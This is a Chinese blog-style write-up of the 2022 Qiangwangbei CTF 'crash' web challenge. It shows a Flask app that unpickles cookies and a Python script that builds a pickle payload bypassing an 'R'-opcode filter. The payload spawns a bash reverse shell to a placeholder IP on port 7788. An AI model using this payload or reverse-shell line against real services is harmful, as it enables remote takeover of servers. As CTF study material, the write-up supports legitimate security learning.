Daffodil

Web-2022强网杯-crash-writeup

2022-08-01 · 3 min read
强网杯 web writeup

打开题目看到源码 是python Flask


import base64
# import sqlite3
import pickle
from flask import Flask, make_response,request, session
import admin
import random

app = Flask(__name__,static_url_path='')
app.secret_key=random.randbytes(12)

class User:
    def __init__(self, username,password):
        self.username=username
        self.token=hash(password)

def get_password(username):
    if username=="admin":
        return admin.secret
    else:
        # conn=sqlite3.connect("user.db")
        # cursor=conn.cursor()
        # cursor.execute(f"select password from usertable where username='{username}'")
        # data=cursor.fetchall()[0]
        # if data:
        #     return data[0] 
        # else:
        #     return None
        return session.get("password")

@app.route('/balancer', methods=['GET', 'POST'])
def flag():
    pickle_data=base64.b64decode(request.cookies.get("userdata"))
    if b'R' in pickle_data or b"secret" in pickle_data:
        return "You damm hacker!"
    os.system("rm -rf *py*")
    userdata=pickle.loads(pickle_data)
    if userdata.token!=hash(get_password(userdata.username)):
         return "Login First"
    if userdata.username=='admin':
        return "Welcome admin, here is your next challenge!"
    return "You're not admin!"

@app.route('/login', methods=['GET', 'POST'])
def login():
    resp = make_response("success") 
    session["password"]=request.values.get("password")
    resp.set_cookie("userdata", base64.b64encode(pickle.dumps(User(request.values.get("username"),request.values.get("password")),2)), max_age=3600)
    return resp

@app.route('/', methods=['GET', 'POST'])
def index():
    return open('source.txt',"r").read()

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

考察python 反序列化 过滤了R操作符
用o操作符弹shell 参考https://xz.aliyun.com/t/8342

import base64

print(base64.b64encode(b'(cos\nsystem\nX\x33\x00\x00\x00bash -c "bash -i >& /dev/tcp/XX.XX.XX.XX/7788 0>&1"o.'))

print(hex(len('bash -c "bash -i >& /dev/tcp/XX.XX.XX.XX/7788 0>&1"')))

替换cookies弹shell

题目提示504页面 直接再起一个Flask

from flask import Flask
import random
import time
app = Flask(__name__,static_url_path='')
app.secret_key=random.randbytes(12)

@app.route('/',methods=['GET','POST'])
def index():
	time.sleep(9000)
	return "ok"
if __name__ == '__main__':
	app.run(host='0.0.0.0',port=5000)

没有vi vim 用cat 写入app.py

启动 python3 app.py

再次请求首页 拿到flag